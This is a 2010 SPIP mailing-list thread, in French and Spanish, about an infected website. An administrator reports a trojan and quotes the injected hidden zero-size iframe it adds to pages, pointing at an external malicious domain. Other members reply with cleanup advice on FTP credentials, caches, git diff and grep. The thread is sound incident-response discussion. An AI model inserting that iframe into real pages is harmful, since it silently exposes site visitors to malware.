[SPIP Zone] [Spip-es] alerta troyano

davux · Avril 26, 2010, 6:55

Yo, je vous fais suivre un mail qui a l'air aussi évasif qu'incertain
(j'ai pas dit fumeux), mais si vous avez des infos, confirmations,
informations ou corrections... "adelante" ("allez-y", en mexicain).

Je pense que ça se comprend grosso-modo, mais je mets une traduction
plus bas.

-------
Fecha: Mon, 26 Apr 2010 20:21:20 +0200
Desde: jose luis murillo <joseluis@digital77.com>
Para: Spip-es@rezo.net
Asunto: [Spip-es] alerta troyano

Hola.

En uno de los sitios con spip se ha colado un troyano que crea este
frame al final de la página:

<html><body><iframe src="http://mumukafes.net/trf/index.php
<view-source:http://mumukafes.net/trf/index.php>"width="0"height="0"frameborder="0"></iframe></body></html>

En principio podría ser por un subdirectorio donde tienen montado un
wordpress ya que está sufriendo un ataque de este tipo estos días
(http://darkom.cl/home/1-ultimas-noticias/121-ataque-masivo-de-malware-a-blogs-wordpress.html)

Pero como se ha metido en su base de datos y trabaja sobre el dominio
principal infecta todas las páginas incuidas las de spip.

Estoy trabajando para limpiarlo, pero si alguien tiene más información
sería bueno conocerla.

Si no os sale el mensajito de software con sitio malicioso en vuestras
webs tranquis que no tenéis problema.

Un saludo.

Salut,

Sur l'un des sites SPIP s'est posé un cheval de troie qui crée cette
frame à la fin de la page :

<html><body><iframe src="http://mumukafes.net/trf/index.php
<view-source:http://mumukafes.net/trf/index.php>"width="0"height="0"frameborder="0"></iframe></body></html>

Il est possible que ça vienne d'un sous-répertoire contenant un
wordpress, étant donné que celui-ci a reçu une attaque du même genre
ces jours-ci (http://darkom.cl/home/1-ultimas-noticias/121-ataque-masivo-de-malware-a-blogs-wordpress.html)

Mais comme il s'est mis dans la base de données et qu'il travaille sur
le domaine principal, il infecte toutes les pages y compris celles de
SPIP.

Je suis en train de le nettoyer, mais si quelqu'un a d'autres
informations, je prends.

Si vous n'avez pas de message "site malveillant" du logiciel sur vos
sites, pas d'inquiétude, vous n'avez pas de problème.

joseluis · Avril 26, 2010, 7:07

gracias, davux

On 26/04/10 20:55, davux wrote:

Yo, je vous fais suivre un mail qui a l'air aussi évasif qu'incertain
(j'ai pas dit fumeux), mais si vous avez des infos, confirmations,
informations ou corrections... "adelante" ("allez-y", en mexicain).

denisb1 · Avril 26, 2010, 9:39

Le 26/04/10 20:55, davux a écrit :

Yo, je vous fais suivre un mail qui a l'air aussi évasif qu'incertain
(j'ai pas dit fumeux), mais si vous avez des infos, confirmations,
informations ou corrections... "adelante" ("allez-y", en mexicain).

toujours et encore la faille filezilla/ftp
donc :

désinfecter *sa* propre machine ainsi que celle
de *tous* ceux qui ont un accès ftp au serveur

changer les login/pass ftp d'accès au serveur

nettoyer les fichiers (ça risque d'être long plutôt
réinstaller)

vider tous les fichiers de cache : tmp/ local/

changer les login/pass d'accès à la bdd, d'accès à spip

aller regarder en bdd (au cas où)

je ne pense pas (ça n'engage que moi) qu'il soit allé
installer quoi que ce soit en bdd.
plutôt une intervention sur les fichiers (index.php,
spip.php, les xxx.js ...)

davux · Avril 26, 2010, 10:33

Merci denisb pour ces informations !

26 Apr 2010, denisb:

nettoyer les fichiers (ça risque d'être long plutôt
réinstaller)

Je profite de l'occasion pour rappeller [1] qu'il est possible de gérer
son site SPIP via un système de suivi de révisions. Dans ce genre de
situations, ça permet via un simple "git diff" (ou équivalent suivant
le système utilisé) de détecter les modifications éventuelles faites
sur les fichiers, et donc de s'épargner une réinstallation inutile si
les fichiers s'avèrent inchangés.

Par ailleurs, avec git (je sais pas pour les autres), il y a un système
de vérification d'intégrité avec des checksums de partout, prévu
exactement pour éviter les corruptions de ce genre, qui empêche de
"modifier l'histoire"... donc même un ver qui chercherait à "truquer"
les commits antérieurs pour cacher ses modifications ne le pourrait
pas.

[1] Article sur Git et SPIP:

--
davux

jose_luis1 · Avril 26, 2010, 10:41

Trouvé! dans index.php, merçi

On 27/04/10 00:33, davux wrote:

Merci denisb pour ces informations !

26 Apr 2010, denisb:

nettoyer les fichiers (ça risque d'être long plutôt
réinstaller)

Je profite de l'occasion pour rappeller [1] qu'il est possible de gérer
son site SPIP via un système de suivi de révisions. Dans ce genre de
situations, ça permet via un simple "git diff" (ou équivalent suivant
le système utilisé) de détecter les modifications éventuelles faites
sur les fichiers, et donc de s'épargner une réinstallation inutile si
les fichiers s'avèrent inchangés.

Par ailleurs, avec git (je sais pas pour les autres), il y a un système
de vérification d'intégrité avec des checksums de partout, prévu
exactement pour éviter les corruptions de ce genre, qui empêche de
"modifier l'histoire"... donc même un ver qui chercherait à "truquer"
les commits antérieurs pour cacher ses modifications ne le pourrait
pas.

[1] Article sur Git et SPIP:
Gérer le développement de son site avec Git - SPIP-Contrib

cerdic · Avril 27, 2010, 1:19

Si c'est le virus qui se répand par FTP, tu en trouveras aussi partout dans les fichiers .php de tmp/cache, de tmp/sessions/, et dans tous les index.php.
Il faut un gros grep sur une chaine typique du virus pour tous les trouver.

Cédric

Le 27 avr. 2010 à 00:41, jose luis murillo a écrit :

Trouvé! dans index.php, merçi

On 27/04/10 00:33, davux wrote:

Merci denisb pour ces informations !

26 Apr 2010, denisb:

nettoyer les fichiers (ça risque d'être long plutôt
réinstaller)

Je profite de l'occasion pour rappeller [1] qu'il est possible de gérer
son site SPIP via un système de suivi de révisions. Dans ce genre de
situations, ça permet via un simple "git diff" (ou équivalent suivant
le système utilisé) de détecter les modifications éventuelles faites
sur les fichiers, et donc de s'épargner une réinstallation inutile si
les fichiers s'avèrent inchangés.

Par ailleurs, avec git (je sais pas pour les autres), il y a un système
de vérification d'intégrité avec des checksums de partout, prévu
exactement pour éviter les corruptions de ce genre, qui empêche de
"modifier l'histoire"... donc même un ver qui chercherait à "truquer"
les commits antérieurs pour cacher ses modifications ne le pourrait
pas.

[1] Article sur Git et SPIP:
Gérer le développement de son site avec Git - SPIP-Contrib

_______________________________________________
spip-zone@rezo.net - http://listes.rezo.net/mailman/listinfo/spip-zone

joseluis · Avril 27, 2010, 1:37

Merçi. Dans les temp/ je ne l’ai trouvé pas, mais si dans tous les index.php

Il est posible de repandre ce virus par filezilla sur linux?

je seulement utilise filezilla avec linux.

Salut!